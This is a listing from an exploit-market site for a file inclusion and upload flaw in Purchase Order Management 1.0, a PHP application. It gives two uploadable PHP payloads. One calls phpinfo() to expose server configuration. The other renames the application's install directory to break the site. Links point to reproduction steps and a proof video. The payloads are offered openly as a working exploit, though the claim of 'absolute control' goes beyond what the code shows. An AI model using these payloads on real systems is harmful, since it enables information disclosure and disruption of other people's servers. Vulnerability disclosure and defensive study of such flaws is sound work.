[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Purchase Order Management - 1.0 - File Inclusion Vulnerabilities

Author
nu11secur1ty
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-38250
Category
web applications
Date add
06-03-2023
Platform
php
## Title: Purchase Order Management-1.0 - File Inclusion Vulnerabilities - Unprivilage user interaction 
## Author: nu11secur1ty
## Date: 03.06.2023
## Vendor: https://www.sourcecodester.com/user/257130/activity
## Software: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html
## Reference: https://brightsec.com/blog/file-inclusion-vulnerabilities/

## Description:
The Purchase Order Management-1.0 suffer from File Inclusion Vulnerabilities.
The users of this system are allowed to submit input into files or upload files to the server.
The malicious attacker can get absolute control of this system!

STATUS: CRITICAL Vulnerability


[+]Get Info:

```PHP
<?php
// by nu11secur1ty - 2023
	phpinfo();
?>

```
[+]Exploit:

```PHP
<?php 
// by nu11secur1ty - 2023
// Old Name Of The file
$old_name = "C:/xampp7/htdocs/purchase_order/" ; 
  
// New Name For The File
$new_name = "C:/xampp7/htdocs/purchase_order_stupid/" ; 
  
// using rename() function to rename the file
rename( $old_name, $new_name) ;
  
?>
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2023/Purchase-Order-Management-1.0)

## Proof and Exploit:
[href](https://streamable.com/vkq31h)

#  0day.today [2024-11-15]  #